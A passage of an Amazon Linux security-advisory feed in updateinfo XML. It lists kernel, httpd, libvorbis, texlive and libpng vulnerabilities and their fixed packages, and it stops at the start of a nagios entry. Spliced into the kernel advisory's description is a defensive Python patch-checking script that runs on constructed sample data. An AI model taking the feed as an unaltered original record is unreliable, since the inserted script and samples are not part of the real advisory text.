version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-server-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-embedded-devel" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-embedded-devel-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-debuginfo" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-debuginfo-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-devel" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-devel-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-bench" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-bench-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-test" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-test-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-embedded" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-embedded-5.1.61-1.27.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-45</id><title>Amazon Linux - ALAS-2012-45: medium priority package update for kernel</title><issued date="2012-02-15 17:38:00" /><updated date="2014-09-14 15:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4086:
The journal_unmap_buffer function in fs/jbd2/transaction.c in the Linux kernel before 3.3.1 does not properly handle the _Delay and _Unwritten buffer head states, which allows local users to cause a denial of service (system crash) by leveraging the presence of an ext4 filesystem that was mounted with a journal.
749143:
CVE-2011-4086 kernel: jbd2: unmapped buffer with _Unwritten or _Delay flags set can lead to DoS
A flaw was found in the way the Linux kernel's journal_unmap_buffer() function handled buffer head states. On systems that have an ext4 file system with a journal mounted, a local, unprivileged user could use this flaw to cause a denial of service.
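Every record in this feed, the ghostscript and kernel advisories above included, carries the same update/id/severity/references/pkglist layout, and deciding whether an advisory still applies to a host comes down to comparing the installed epoch:version-release of each listed package against the fixed one with rpm's comparison rules rather than a plain string comparison (1.18.amzn1 is newer than 1.2.amzn1). On a live Amazon Linux host yum's updateinfo command performs that evaluation; the following Python script is an added example, not part of this feed or of the Amazon Linux tooling, that does the same offline against a copy of the feed. The advisory records and the rpm -qa listing it runs on are constructed samples modelled on ALAS-2012-42 and ALAS-2012-45 above; the query format given in the code is the one that would produce such a listing on a real host.

```python
"""Added example, not part of the feed: evaluate a yum updateinfo.xml feed (the
layout of this file) against installed packages using rpm's version rules."""
import re
import xml.etree.ElementTree as ET

_SEGMENT = re.compile(r"[0-9]+|[a-zA-Z]+|~")

def rpmvercmp(a: str, b: str) -> int:
    """1 if a is newer than b, -1 if older, 0 if equal (rpmvercmp rules: separators
    ignored, numeric segments beat alphabetic ones, '~' sorts before anything)."""
    one, two = _SEGMENT.findall(a), _SEGMENT.findall(b)
    for x, y in zip(one, two):
        if x == "~" or y == "~":
            if x != y:
                return 1 if y == "~" else -1
            continue
        xd, yd = x.isdigit(), y.isdigit()
        if xd != yd:
            return 1 if xd else -1
        if xd and int(x) != int(y):
            return 1 if int(x) > int(y) else -1
        if not xd and x != y:
            return 1 if x > y else -1
    if len(one) == len(two):
        return 0
    a_longer = len(one) > len(two)
    tail = (one if a_longer else two)[min(len(one), len(two))]  # first extra segment
    return (-1 if a_longer else 1) if tail == "~" else (1 if a_longer else -1)

def evr_cmp(x, y):
    """Compare (epoch, version, release) tuples; epoch decides before version."""
    return next((c for c in map(rpmvercmp, x, y) if c != 0), 0)

def parse_updateinfo(xml_text: str):
    """Yield (advisory, severity, cves, [(name, arch, epoch, version, release)])."""
    for upd in ET.fromstring(xml_text).iter("update"):
        cves = [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"]
        pkgs = [(p.get("name"), p.get("arch"), p.get("epoch", "0"),
                 p.get("version"), p.get("release")) for p in upd.iter("package")]
        yield upd.findtext("id"), upd.findtext("severity"), cves, pkgs

def parse_installed(rpm_qa_output: str) -> dict:
    """Map 'NAME ARCH EPOCH VERSION RELEASE' lines to {(name, arch): evr}; rpm prints
    '(none)' for an unset epoch (meaning 0), and of several kernels only the newest counts."""
    installed = {}
    for line in filter(str.strip, rpm_qa_output.splitlines()):
        name, arch, epoch, version, release = line.split()
        evr = ("0" if epoch == "(none)" else epoch, version, release)
        if (name, arch) not in installed or evr_cmp(evr, installed[(name, arch)]) == 1:
            installed[(name, arch)] = evr
    return installed

def missing_advisories(xml_text: str, installed: dict) -> list:
    """Advisories with an installed package older than the fix; packages not installed are skipped."""
    report = []
    for adv, sev, cves, pkgs in parse_updateinfo(xml_text):
        affected = []
        for name, arch, epoch, version, release in pkgs:
            have = installed.get((name, arch))
            if have is not None and evr_cmp(have, (epoch, version, release)) == -1:
                affected.append(f"{name}.{arch} {have[0]}:{have[1]}-{have[2]}")
        if affected:
            report.append((adv, sev, cves, affected))
    return report

def build_sample_feed() -> str:
    """Constructed sample in this file's layout, modelled on ALAS-2012-42 (ghostscript)
    and ALAS-2012-45 (kernel), assembled with ElementTree."""
    root = ET.Element("updates")
    spec = [("ALAS-2012-42", "medium", ["CVE-2010-4820", "CVE-2010-4054"],
             "8.70", "11.20.amzn1", ["ghostscript", "ghostscript-devel"]),
            ("ALAS-2012-45", "medium", ["CVE-2011-4086"],
             "2.6.35.14", "107.1.36.amzn1", ["kernel", "kernel-headers"])]
    for adv, sev, cves, ver, rel, names in spec:
        upd = ET.SubElement(root, "update", status="final", type="security")
        ET.SubElement(upd, "id").text = adv
        ET.SubElement(upd, "severity").text = sev
        refs = ET.SubElement(upd, "references")
        for cve in cves:
            ET.SubElement(refs, "reference", id=cve, type="cve")
        coll = ET.SubElement(ET.SubElement(upd, "pkglist"), "collection", short="amazon-linux")
        for name in names:
            for arch in ("i686", "x86_64"):
                pkg = ET.SubElement(coll, "package", name=name, version=ver, release=rel, epoch="0", arch=arch)
                ET.SubElement(pkg, "filename").text = f"Packages/{name}-{ver}-{rel}.{arch}.rpm"
    return ET.tostring(root, encoding="unicode")

# Constructed listing in the shape of: rpm -qa --qf '%{NAME} %{ARCH} %{EPOCH} %{VERSION} %{RELEASE}\n'
# (ghostscript one release behind the advisory, two kernels installed, mysql-libs not in the feed)
SAMPLE_RPM_QA = """
ghostscript x86_64 (none) 8.70 11.19.amzn1
kernel x86_64 (none) 2.6.35.14 106.1.35.amzn1
kernel x86_64 (none) 2.6.35.14 107.1.36.amzn1
mysql-libs x86_64 (none) 5.1.61 1.27.amzn1
"""

if __name__ == "__main__":
    print(missing_advisories(build_sample_feed(), parse_installed(SAMPLE_RPM_QA)))
```

Run as is it prints the one advisory the sample host is missing (ALAS-2012-42, because the installed ghostscript is one release behind); point it at the real file and the output of that rpm -qa query to evaluate a host. Two details matter in practice: packages are keyed on name and architecture, since i686 and x86_64 builds are listed and fixed separately, and only the newest of several installed kernels is considered, otherwise an older kernel left installed beside the patched one produces a false positive.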
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4086" title="" id="CVE-2011-4086" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-107.1.36.amzn1.noarch.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="perf" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="perf" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package><package name="kernel" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-46</id><title>Amazon Linux - ALAS-2012-46: medium priority package update for httpd</title><issued date="2012-02-16 10:48:00" /><updated date="2014-09-14 15:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0053:
protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
The httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.
CVE-2012-0031:
scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
A flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.
CVE-2011-3639:
The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
It was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request.
It was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1391) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially-crafted URI.
CVE-2011-3607:
Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions. An attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a ".htaccess" file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the "apache" user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607" title="" id="CVE-2011-3607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3639" title="" id="CVE-2011-3639" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031" title="" id="CVE-2012-0031" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053" title="" id="CVE-2012-0053" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0128.html" title="" id="RHSA-2012:0128" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="httpd-debuginfo" version="2.2.22" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.22-1.23.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.22" release="1.23.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.22-1.23.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.22" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.22-1.23.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.22" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.22-1.23.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.22" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.22-1.23.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.22" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.22-1.23.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.22" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.22-1.23.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.22" release="1.23.amzn1" epoch="0" 
arch="noarch"><filename>Packages/httpd-manual-2.2.22-1.23.amzn1.noarch.rpm</filename></package><package name="httpd-debuginfo" version="2.2.22" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.22-1.23.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.22" release="1.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.22-1.23.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.22" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.22-1.23.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-47</id><title>Amazon Linux - ALAS-2012-47: important priority package update for libvorbis</title><issued date="2012-03-04 16:07:00" /><updated date="2014-09-14 15:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0444:
Mozilla Firefox before 3.6.26 and 4.x through 9.0, Thunderbird before 3.1.18 and 5.0 through 9.0, and SeaMonkey before 2.7 do not properly initialize nsChildView data structures, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted Ogg Vorbis file.
A heap-based buffer overflow flaw was found in the way the libvorbis library parsed Ogg Vorbis media files. If a specially-crafted Ogg Vorbis media file was opened by an application using libvorbis, it could cause the application to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
A flaw was found in the way Firefox parsed Ogg Vorbis media files. A web page containing a malicious Ogg Vorbis media file could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0444" title="" id="CVE-2012-0444" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0136.html" title="" id="RHSA-2012:0136" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libvorbis-debuginfo" version="1.2.3" release="4.6.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-debuginfo-1.2.3-4.6.amzn1.i686.rpm</filename></package><package name="libvorbis" version="1.2.3" release="4.6.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-1.2.3-4.6.amzn1.i686.rpm</filename></package><package name="libvorbis-devel" version="1.2.3" release="4.6.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-devel-1.2.3-4.6.amzn1.i686.rpm</filename></package><package name="libvorbis-debuginfo" version="1.2.3" release="4.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-debuginfo-1.2.3-4.6.amzn1.x86_64.rpm</filename></package><package name="libvorbis-devel-docs" version="1.2.3" release="4.6.amzn1" epoch="1" arch="noarch"><filename>Packages/libvorbis-devel-docs-1.2.3-4.6.amzn1.noarch.rpm</filename></package><package name="libvorbis" version="1.2.3" release="4.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-1.2.3-4.6.amzn1.x86_64.rpm</filename></package><package name="libvorbis-devel" version="1.2.3" release="4.6.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-devel-1.2.3-4.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-48</id><title>Amazon Linux - ALAS-2012-48: medium priority package update for texlive</title><issued date="2012-03-04 16:08:00" /><updated date="2014-09-14 15:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following 
vulnerabilities:
CVE-2011-1554:
Off-by-one error in t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, allows remote attackers to cause a denial of service (application crash) via a PDF document containing a crafted Type 1 font that triggers an invalid memory read, integer overflow, and invalid pointer dereference, a different vulnerability than CVE-2011-0764.
An off-by-one flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
An off-by-one flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
An off-by-one flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
CVE-2011-1553:
Use-after-free vulnerability in t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, allows remote attackers to cause a denial of service (application crash) via a PDF document containing a crafted Type 1 font that triggers an invalid memory write, a different vulnerability than CVE-2011-0764.
A use-after-free flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
A use-after-free flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
A use-after-free flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
CVE-2011-1552:
t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, reads from invalid memory locations, which allows remote attackers to cause a denial of service (application crash) via a crafted Type 1 font in a PDF document, a different vulnerability than CVE-2011-0764.
An out-of-bounds memory read flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash.
An out-of-bounds memory read flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash.
An out-of-bounds memory read flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash.
CVE-2011-0764:
t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, uses an invalid pointer in conjunction with a dereference operation, which allows remote attackers to execute arbitrary code via a crafted Type 1 font in a PDF document, as demonstrated by testz.2184122398.pdf.
An invalid pointer dereference flaw was found in t1lib. A specially-crafted font file could, when opened, cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
An invalid pointer dereference flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
An invalid pointer dereference flaw was found in t1lib. A specially-crafted font file could, when opened, cause a TeX Live utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
CVE-2010-2642:
Two heap-based buffer overflow flaws were found in the way t1lib processed Adobe Font Metrics (AFM) files. If a specially-crafted font file was opened by teTeX, it could cause teTeX to crash or, potentially, execute arbitrary code with the privileges of the user running teTeX.
Two heap-based buffer overflow flaws were found in the way t1lib processed Adobe Font Metrics (AFM) files. If a specially-crafted font file was opened by an application linked against t1lib, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
Two heap-based buffer overflow flaws were found in the way t1lib processed Adobe Font Metrics (AFM) files. If a specially-crafted font file was opened by a TeX Live utility, it could cause the utility to crash or, potentially, execute arbitrary code with the privileges of the user running the utility.
Heap-based buffer overflow in the AFM font parser in the dvi-backend component in Evince 2.32 and earlier, teTeX 3.0, t1lib 5.1.2, and possibly other products allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font in conjunction with a DVI file that is processed by the thumbnailer.
A heap-based buffer overflow flaw was found in the DVI renderer's AFM font file parser. A DVI file that references a specially-crafted font file could, when opened, cause Evince to crash or, potentially, execute arbitrary code with the privileges of the user running Evince.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2642" title="" id="CVE-2010-2642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0764" title="" id="CVE-2011-0764" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1552" title="" id="CVE-2011-1552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1553" title="" id="CVE-2011-1553" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1554" title="" id="CVE-2011-1554" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0137.html" title="" id="RHSA-2012:0137" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="texlive-dviutils" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-dviutils-2007-57.9.amzn1.i686.rpm</filename></package><package name="kpathsea" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/kpathsea-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-context" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-context-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-afm" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-afm-2007-57.9.amzn1.i686.rpm</filename></package><package name="mendexk" version="2.6e" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/mendexk-2.6e-57.9.amzn1.i686.rpm</filename></package><package name="texlive-xetex" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-xetex-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-east-asian" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-east-asian-2007-57.9.amzn1.i686.rpm</filename></package><package 
name="texlive-debuginfo" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-debuginfo-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-utils" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-utils-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-dvips" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-dvips-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-latex" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-latex-2007-57.9.amzn1.i686.rpm</filename></package><package name="kpathsea-devel" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/kpathsea-devel-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive" version="2007" release="57.9.amzn1" epoch="0" arch="i686"><filename>Packages/texlive-2007-57.9.amzn1.i686.rpm</filename></package><package name="texlive-dvips" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-dvips-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="mendexk" version="2.6e" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/mendexk-2.6e-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="kpathsea" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/kpathsea-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-debuginfo" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-debuginfo-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-context" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-context-2007-57.9.amzn1.x86_64.rpm</filename></package><package 
name="texlive-afm" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-afm-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-latex" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-latex-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-utils" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-utils-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-xetex" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-xetex-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-east-asian" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-east-asian-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="texlive-dviutils" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/texlive-dviutils-2007-57.9.amzn1.x86_64.rpm</filename></package><package name="kpathsea-devel" version="2007" release="57.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/kpathsea-devel-2007-57.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-49</id><title>Amazon Linux - ALAS-2012-49: important priority package update for libpng</title><issued date="2012-03-04 16:09:00" /><updated date="2014-09-14 15:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3026:
Integer overflow in libpng, as used in Google Chrome before 17.0.963.56, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an integer truncation.
A heap-based buffer overflow flaw was found in the way XULRunner handled PNG (Portable Network Graphics) images. A web page containing a malicious PNG image could cause an application linked against XULRunner (such as Firefox) to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
A heap-based buffer overflow flaw was found in the way Thunderbird handled PNG (Portable Network Graphics) images. An HTML mail message or remote content containing a specially-crafted PNG image could cause Thunderbird to crash or, possibly, execute arbitrary code with the privileges of the user running Thunderbird.
A heap-based buffer overflow flaw was found in libpng. An attacker could create a specially-crafted PNG image that, when opened, could cause an application using libpng to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3026" title="" id="CVE-2011-3026" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0317.html" title="" id="RHSA-2012:0317" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libpng-static" version="1.2.46" release="2.10.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-static-1.2.46-2.10.amzn1.i686.rpm</filename></package><package name="libpng-debuginfo" version="1.2.46" release="2.10.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-debuginfo-1.2.46-2.10.amzn1.i686.rpm</filename></package><package name="libpng" version="1.2.46" release="2.10.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-1.2.46-2.10.amzn1.i686.rpm</filename></package><package name="libpng-devel" version="1.2.46" release="2.10.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-devel-1.2.46-2.10.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.46" release="2.10.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-static-1.2.46-2.10.amzn1.x86_64.rpm</filename></package><package name="libpng" version="1.2.46" release="2.10.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-1.2.46-2.10.amzn1.x86_64.rpm</filename></package><package name="libpng-devel" version="1.2.46" release="2.10.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-devel-1.2.46-2.10.amzn1.x86_64.rpm</filename></package><package name="libpng-debuginfo" version="1.2.46" release="2.10.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-debuginfo-1.2.46-2.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-50</id><title>Amazon Linux - ALAS-2012-50: medium priority package update for nagios</title><issued date="2012-03-04 16:10:00" /><updated 
date="2014-09-14 15:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-2179:
